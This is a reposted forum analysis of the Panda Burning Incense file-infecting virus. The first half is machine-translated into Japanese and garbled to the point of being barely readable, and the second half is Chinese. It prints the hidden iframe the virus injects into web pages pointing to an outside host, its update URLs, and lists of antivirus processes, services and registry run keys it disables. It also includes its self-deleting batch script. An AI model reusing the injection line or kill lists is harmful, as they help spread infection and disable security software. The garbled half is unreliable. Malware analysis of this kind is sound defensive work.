ナイトブレードの神 - 雪を見るためのフォーラムから転載
https://bbs.pediy.com/thread-224773.htm
ディレクトリ
メモ0x01の分析 - 分析ツール
0x02のウイルス情報
0x03のウイルスの挙動
0x04の砲撃
0x05のウイルス初期分析
1つの0x06でProc_クロック(クロック期間:6000ms)
2 0x07のProc_クロック(クロック周期:1000ミリ秒)
3 0x08にProc_クロック(クロック周期:120000ms)
4 0x09のProc_クロック(クロック周期:10000ms)
5 0x10のProc_クロック(クロック周期:6000ms)
6 0x11をProc_クロック(クロック周期:10000ms)
7 0x12をProc_クロック(クロック周期:180000ms)
0x13に感染スレッド分析
0x14の特定の感染過程の分析
プログラムを実行した後0x15の感染
メモ0x01の分析 - 分析ツール
":\ WINDOWS \ SYSTEM32 \ DRIVERS \ Cを" ディレクトリは、プログラムを実行することはできません(1)このウイルスはWin7_64は少し下、XPのシステム分析に優れています。
<私は、ウイルスの動作環境を決定しようとするためにここに長い時間、ウイルス解析を開催、多くのウイルスは、特定の環境で実行されています>
(2)2つの非常に重要なAPIは、コールバック&&クロックスレッドのコールバックは、分析を必要とします。
SetTimer:ウイルスは、多くの場合、クロックで指定されたプロセスの最後にタイムアウトしました。
CreateThread:他のコードの分岐を実行し、感染したPEファイルからコードが実行のスレッドを使用することです。
(3)IDA署名機能を、アシスト分析多くを識別できる機能を。
分析ツール
火口の剣:敏感な動作の検知をするときODの動的デバッグ解析機能がうまく機能を支援するために、非常に良いです。
OD、IDA、010Editor:
BCompare:六角アライメントプログラム感染前および感染後
PEツール:&&シェルプログラミング言語識別チェック。
0x02のウイルス情報
(1)ファイルサイズ:30,001バイト
(2)MD5。512301C535C88255C9A252FDF70B7A03
(3)シェル:FSGのV2.0
(4)言語で書かれた:デルファイ
0x03のウイルスの挙動
(1)スタートアップ項目を書きます
(2)サービスを閉じ
(3)PEファイル感染
必要に更新するか否か(4)指定されたURLへのアクセスを決定します
<|システム隠さ>(5)文書のリリース、および設定ファイルの属性
(6)プロセスの権限を強化します
(7)指定されたウィンドウ名にQUITメッセージを送信する、ウィンドウ名を横断し、指定されたプロセスの終わり
0x04の砲撃
(1)シェルを確認
(1)OEPで実行するには、そのファイルをダンプします。
(2)表のIATの終わりを修復した後、ImpRECツールの修理砲撃の成功を入力するためにテーブルを使用しています。
0x05のウイルス初期分析
(1)文字列を変更するか否かが決定されます
(2)3つの最も重要な機能
(3)Desktop_.iniかどうかが決定
(4)自体がメモリに読み込まれ
(5): "C \ WINDOWS \ SYSTEM32 \ドライバ\ spo0lsv.exe" 大文字にし、そして自分のパスを対比
あなたがいない "C:\ WINDOWS \ SYSTEM32 \ DRIVERS \ spo0lsv.exe" を行う場合には(6)を実行している時に、 ":\ WINDOWS \ SYSTEM32 \ DRIVERS \ spo0lsv.exe C" に自身をコピーします。
"C:\ WINDOWS \ SYSTEM32 \ DRIVERS \ spo0lsv.exe" を実行し、自分自身を終了
1つの0x06でProc_クロック(クロック期間:6000ms)
(1)必要性は、文書のリリースを決定した場合
(2)手紙に自分自身をコピーし、ディスクを横断:\ setup.exeを
(3)ディスクを横断、手紙を作成:\ AUTORUN.INFファイルを
(4)設定setup.exeファイル属性、<システム、隠されました>
(5)に配置されたautorun.infファイル属性、<システム、隠されました>
(6)設定項目を書きます
2 0x07のProc_クロック(クロック周期:1000ミリ秒)
(1)プロセスの権限を昇格
(2)指定されたウィンドウ名にQUITメッセージを送信する、ウィンドウ名を横断し、指定されたプロセスの終わり
ウィンドウリストを探します:
ファイアウォール、プロセス、VirusScanの、NOD32、インターネットセキュリティ、アンチウイルス、Kingsoftの、ライジング、Jiangminは、スーパーウサギ、最適化の第一人者、トロイの木馬スカベンジャー、スカベンジャートロイの木馬、カスペルスキーアンチウイルス
Symantec AntiVirus,Duba,esteem procs,绿鹰PC,密码防盗,噬菌体,木马辅助查找器,System Safety Monitor,Wrapped giftKiller
Winsock Expert,游戏木马检测大师,超级巡警,msctls_statusbar32,pjf(ustc),IceSword,
结束的进程列表:
Mcshield.exe,VsTskMgr.exe,naPrdMgr.exe,UpdaterUI.ex,TBMon.exe,scan32.exe,Ravmond.exe,CCenterexe,RavTask.exe,Rav.exe,
Ravmon.exe,RavmonD.exe,RavStub.exe,KVXP.kxp,KvMonXP.kxp,KVCenter.kxp,KVSrvXP.exe,KRegEx.exe,UIHost.exe,TrojDiekxp,
FrogAgent.exe,Logo1_.exe,Logo_1.exe,Rundl132.exe,regedit.exe,msconfig.exe,taskmgr.exe
(3) 写启动项
(4) 设置隐藏的文件和文件夹,不可见
0x08 Proc_时钟3 (时钟周期: 120000ms)
(1) 通过 “http://www.ac86.cn/66/up.txt” 这个地址来更新, 网址已经失效了
0x09 Proc_时钟4 (时钟周期: 10000ms)
(1) 遍历磁盘, 关闭共享
(2) 关闭admin的共享
(3) 杀死当前时钟
0x10 Proc_时钟5 (时钟周期: 6000ms)
(1) 将杀毒软件的注册表启动项设置为失效, 设置值为2, 被针对的杀毒软件注册表启动项列表如下:
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkAssociates Error Reporting Service"
"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse"
(2) 使用两种方式停止服务程序, 被停止的列表如下:
"sharedaccess","RsCCenter","RsRavMon","KVWSC" ,"KVSrvXP","kavsvc","AVP"
"McAfeeFramework","McShield","McTaskManager","navapsvc","wscsvc","KPfwSvc"
"KPfwSvc","ccProxy","ccProxy","ccProxy","SPBBCSvc","Symantec Core LC"
"NPFMntor","NPFMntor","FireSvc"
0x11 Proc_时钟6 (时钟周期: 10000ms)
() 会获取这些网站的网页源码:
0x12 Proc_时钟7 (时钟周期: 180000ms)
(1) 通过 “http://update.whboy.net/worm.txt” 这个地址来更新, 网址已经失效了
0x13 感染线程分析
(1) 感染线程回调函数
(2) 获取所有磁盘名
(3) 遍历磁盘_感染目标
(4) 感染的文件类型为: "EXE", "SRC", "PIF", "COM"
(5) 在网页文件 "html", "asp", "php", "jsp", "aspx" 的尾部加上 <iframe src=http://www.ac86.cn/66/index.htm width="0" height="0"></iframe>.
0x14 具体感染流程分析
(1) 读入目标文件
(2) 从将要感染程序中查找 "WhBoy", 找到则说明已经被感染了
(3) 设置目标文件属性为 “NORMAL”
(4) 将自身复制为目标文件
(5) 将目标程序追加到病毒后面
(6) 感染后的标志为 “WhBoy” + 被感染程序名 + “.exe”
0x15 感染后程序的运行
(1) <感染后程序> 的结构,
(2) 判断是否被感染, 感染则跳转
(3) 创建 自身进程名 + “.exe”文件
(4) 从自身中提取 <源程序> 并写到 “BeInfected.exe.exe”
(5) 在 Temp目录 写批处理 并 运行批处理
批处理内容:
//循环删除自身, 直至删除成功
:try1
del "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"
if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe" goto try1
//将 BeInfected.exe.exe 修改为 BeInfected.exe, 并运行 BeInfected.exe.
ren "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" "BeInfected.exe"
if exist "C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe.exe" goto try2
"C:\Documents and Settings\Administrator\桌面\2222\BeInfected.exe"
:try2
del %0
执行生成的批处理
(6) <感染后程序> 就被还原成 <源程序> 了, 并运行 <源程序>.
(1) 有什么错误请大神们指出.
(2) 并感谢15PB老师们的帮助和教导.